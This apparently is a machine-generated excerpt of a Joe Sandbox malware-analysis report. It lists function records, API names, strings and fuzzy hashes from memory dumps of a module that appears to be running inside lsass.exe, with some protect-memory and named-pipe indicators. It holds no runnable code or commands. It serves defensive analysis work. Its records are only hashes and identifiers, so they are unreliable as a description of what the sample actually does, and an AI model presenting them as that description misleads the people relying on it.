• Instruction Fuzzy Hash: 86214135618B8883F710CB25F44479977B0FB8A7A5F544215EA5D42BA9CF7CC18ACB80

Control-flow Graph (graph rendering not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: f1b2e66ae6bc37b8342484b90d8886f71c9a8eb152aeb9d45bfa4c0d700f0494
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: 6AD18B72608B888AFB609B65A5883DD77B0FB45798F081216EE8D57B9BDB34C5D2C700

Control-flow Graph (graph rendering not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: f8fb045fb90e4a2d3b997f1db0de6407844043880da660533e616368e6afbf85
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: 26D19E7260CB988AEB609F65E4403ED77B0FB45788F081106EE8D57B96DB74E4DAC700
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
• Instruction ID: 5472dc4859f2ec678e8526d892e9dc35e12882832a061a9c28273b9cf07cc402
• Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041B032319F4851FA25CB66B8047D522B5FF89BE0F4D52259D0D9B786EB79C4C68340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 7ceb33411e866d5e6bad0885634960f762de516c8c48caabf9af1da6179ea09c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35415F36218F84C6E760CF61F44479A77B1F789B98F088129DA8947759DF7CC48ACB80
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: 2491d24410cb46268f94260e2639c8758f3e2d5a9eecc6da8c164988f1d14004
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA114C3060DB4C81FE58A73279613E922B2AF447E0F1C4324E97D4A6DBDEA8D4C38311
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: 14a86301810562fa968fb798af1d75a374cb01e83c23393911485301656b1b25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B81A37960CF8D86FA64AB65B8493D966B0AF85780F5C8525AE0C4779FDB38CCC78700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: ca403a1a5602c85c8bb9038eef2cd80d17c8cae6d6c05ab0e2c7db901c7f5f0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C981BF31A1CF4DA6FB70AB65B4413E926B0AF85B80F6C4055EA0D47797EBB8C9C78740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 687ad33320da4c6a2d702a3c851c8e0a789a4fc93b2b137df9a9527406f721b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6931E13134EF58A1EE519B42B801BD523B4BF49BA0F5D26259D1D0B392EF79D4CA8340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: b286c26bad5599ec3e4dce0df1cbee38a854a1552613a0a24c44eaeb964dc17e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63116031718F8886E7508B56F94439966B0FB88FE4F084224EE5E8779ACF3CC48687C0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction ID: a133de99f9e09dc66d4cec223420a026b9debbf19d123a2964e23df4e8ddc47c
• Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction Fuzzy Hash: 34115E3A708B4583EF249B52F4042A966B0FB89B95F080069DE9D07B56EF3DC586C744
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
• Instruction ID: 5852f0580ab69e97f1a52fd2e322d2a7f92818f85b2362e8f5bcff1b012e8ad0
• Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
• Instruction Fuzzy Hash: 61D18B76209F8881EA71DF16F49439A77B0F788B84F145216EA8D4776ADF78C592CB00
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID: C:\Windows\system32\lsass.exe
• API String ID: 3168794593-3553486595
• Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction ID: 6100b6c19792221e5ab68393cc76ae802cdc86c35694ed7f9ff5f1585bdaadd1
• Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction Fuzzy Hash: E9316FBB54DFC88AE3518F66B8552893FB0FB89F40F0D8096DB4843247EA299486C7C0
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction ID: 89a0addc245c739b2e1241a26f07f7771b3cddb85ef77f011d7e29de442e1be8
• Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction Fuzzy Hash: 3C114A3020DF4882FE54A73175513A92272AF497A4F5C0724E97F4A7DBDEE8D4838260
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction ID: 103a84cc079cad328c3536a9994b729114022c249ba88867120555d5bc1d5874
• Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction Fuzzy Hash: 7D013535308B8886EA20DB12B85839963B1FB88BC0F884074DE5D43756DE3CC98A8780
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
• Instruction ID: 45d3aafdb8d7983e479a19dca995c96b276e104aef41bcde3e98c265d121dafb
• Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
• Instruction Fuzzy Hash: 5F012D79619F8982FB249B21F81839976B0FF49B86F084164C94D07366EF3DC5968780
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
• Instruction ID: 67b5377c4882bdd2fb480e4c15f4ea076b6d168c4ac18011086163db52505644
• Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
• Instruction Fuzzy Hash: 4AF04F75219F4C91EB108B68F4447996370AF89B61F5C0619D66E455E6CF2CC0CA83C0
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction ID: a71ca98afc5d1a3faeee4372e4a7ee3782857345fd784a6b70abb11282a46d7d
• Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction Fuzzy Hash: D4F0F878618FD892EA148F17B914199A675AF48FD0F4C9160EE8E47B6ADE28C4C68780
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
• Instruction ID: e6d87f0c609476c9c3fe7a6a5eb031aa0c38f023ad504c3198547cd31559fcd5
• Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
• Instruction Fuzzy Hash: D802D53221DB8886EB61CF59F49079AB7B0F785790F144115EA8E87BA9DFBCD485CB00
APIs
Memory Dump Source
• Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
• Instruction ID: b95a49320f5f936f0cbfd1ad766bc8001534a62ea65b0c2045d606bdb59b6b9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2061C63651CB88C6E7618F15F45439AB7B0F788784F581255EA8D47BAADBBCC582CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: c84d9aacd1d8addd50e5f2eacee9ba06884b6ff10871cfc468d780551510e725
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40117737A5CF9903F6F42168FA563E511706FD9374F0D0624A5AE076EBDA68C9C34A00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: f6ebd2a08155cb11d01359cfb63a2bca7832278ab15c1ba96f775ce0276b74ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C118236A1CF5902F69421A8F5463EA15716F59378F0C0624EBBF066EFCA28A8C346C0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                                • Opcode ID: 262bc654722f382832ee849732648380985e09d24724c89ec07dab82b46ccafe
                                                                                                                                                                                                                                                • Instruction ID: fb1fb065e3761e1735645901ad562fda475c9c7d98b9c26518c4587266ea644e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 262bc654722f382832ee849732648380985e09d24724c89ec07dab82b46ccafe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6611213065EF9841FA649725BC407E922B16F847E0F1C5B65992E077DBDE68D8C38640
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 9703ed410a9340cc908e4931cf78f7e29496ba7c3cf6789e4f5c51a701e75255
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC51D132359B098ADB54CF15F444BAC73B2FB44B88F588124EA5E4378ADBB9D8C2C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 37d8c610e4af2e6b97041494e605923acf12223c33339c91c8d6a38ae5c6032d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41615C72508BC885E7609F15F4407DAB7B0FB85B98F084215EB9D07B9ADBB8D1D5CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 3a2f33974cbffdbc27016b30a0180f43e39ef5857859974130326578c4fd82b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E351713210CB888AFB648F16A548398B7B0FB54B94F5C5115DA8D47BDBCB38D4D2CB45
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 7c6e6b287cefa42d2b4f20f59e5748d3ba937cd9ba642ee52733f0753b695d25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: 68e8b1febf842112ef1852bde589c052e9c51d18d31615125d5cae841ebc14e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC113A35606F8881EA54DB66B8042A9B7B1FF89FC0F1D4068DE4D97766DE79D4838380
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
